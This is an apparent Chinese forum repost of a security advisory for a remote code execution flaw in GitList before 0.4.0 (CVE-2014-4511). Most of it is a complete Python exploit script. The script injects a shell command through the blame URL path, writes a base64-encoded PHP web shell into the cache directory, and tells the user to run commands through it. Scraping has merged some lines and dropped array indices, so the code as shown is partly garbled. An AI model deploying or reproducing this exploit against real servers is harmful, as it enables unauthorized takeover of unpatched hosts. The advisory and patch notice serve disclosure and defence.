西域孤鸿 發表於 2014-7-3 10:05:26

GitList远程代码执行漏洞(CVE-2014-4511)

<p>受影响系统:<br />GitList GitList &lt; 0.4.0<br />&nbsp;GitList GitList<br />描述:<br />--------------------------------------------------------------------------------<br />BUGTRAQ&nbsp; ID: 68253<br />&nbsp;CVE(CAN) ID: CVE-2014-4511<br />&nbsp;<br />GitList是用PHP编写的开源软件,是git库浏览器。<br />&nbsp;<br />GitList 0.4.0之前版本在实现上存在远程代码执行漏洞,远程攻击者可利用此漏洞执行任意代码。<br />&nbsp;<br />&lt;*来源:drone<br />&nbsp; *&gt;<br />测试方法: --------------------------------------------------------------------------------</p>
<p>警 告</p>
<p>以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p>
<p><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode33"><br />from commands import getoutput<br /> import urllib<br /> import sys<br /> from commands import getoutput<br /> import urllib<br /> import sys<br />"""<br /> Exploit Title: Gitlist &lt;= 0.4.0 anonymous RCE<br /> Date: 06/20/2014<br /> Author: drone (@dronesec)<br /> Vendor Homepage: &lt;a href="http://gitlist.org/"&gt;http://gitlist.org/&lt;/a&gt;<br /> Software link: &lt;a href="https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz"&gt;https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz&lt;/a&gt;<br /> Version: &lt;= 0.4.0<br /> Fixed in: 0.5.0<br /> Tested on: Debian 7<br /> More information: &lt;a href="http://hatriot.github.io/blog/2014/06/29/gitlist-rce/"&gt;http://hatriot.github.io/blog/2014/06/29/gitlist-rce/&lt;/a&gt;<br /> cve: CVE-2014-4511<br /> """<br />if len(sys.argv) &lt;= 1:<br />    print '%s: {cache path}' % sys.argv<br />    print 'Example: python %s &lt;a href="http://localhost/gitlist/my_repo.git'"&gt;http://localhost/gitlist/my_repo.git'&lt;/a&gt; % sys.argv<br />    print 'Example: python %s &lt;a href="http://localhost/gitlist/my_repo.git"&gt;http://localhost/gitlist/my_repo.git&lt;/a&gt; /var/www/git/cache' % sys.argv<br />    sys.exit(1)<br />url = sys.argvurl = url if url[-1] != '/' else url[:-1]<br />path = "/var/www/gitlist/cache"<br /> if len(sys.argv) &gt; 2:<br />    path = sys.argv<br />print '[!] Using cache location %s' % path<br /># payload &lt;?system($_GET['cmd']);?&gt;payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="<br /># sploit; python requests does not like this URL, hence wget is used<br /> mpath = '/blame/master/""`echo {0}|base64 -d &gt; {1}/x.php`'.format(payload, path)<br /> mpath = url+ urllib.quote(mpath)<br />out = getoutput("wget %s" % mpath)<br /> if '500' in out:<br />    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)<br /> else:<br />    print '[-] Failed to drop'<br />    print out<br /></div></p>
<p>建议:<br />--------------------------------------------------------------------------------<br />厂商补丁:<br />&nbsp;<br />GitList<br />&nbsp;-------<br />&nbsp;目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:<br />&nbsp;<br />http://gitlist.org/</p>
頁: [1]
查看完整版本: GitList远程代码执行漏洞(CVE-2014-4511)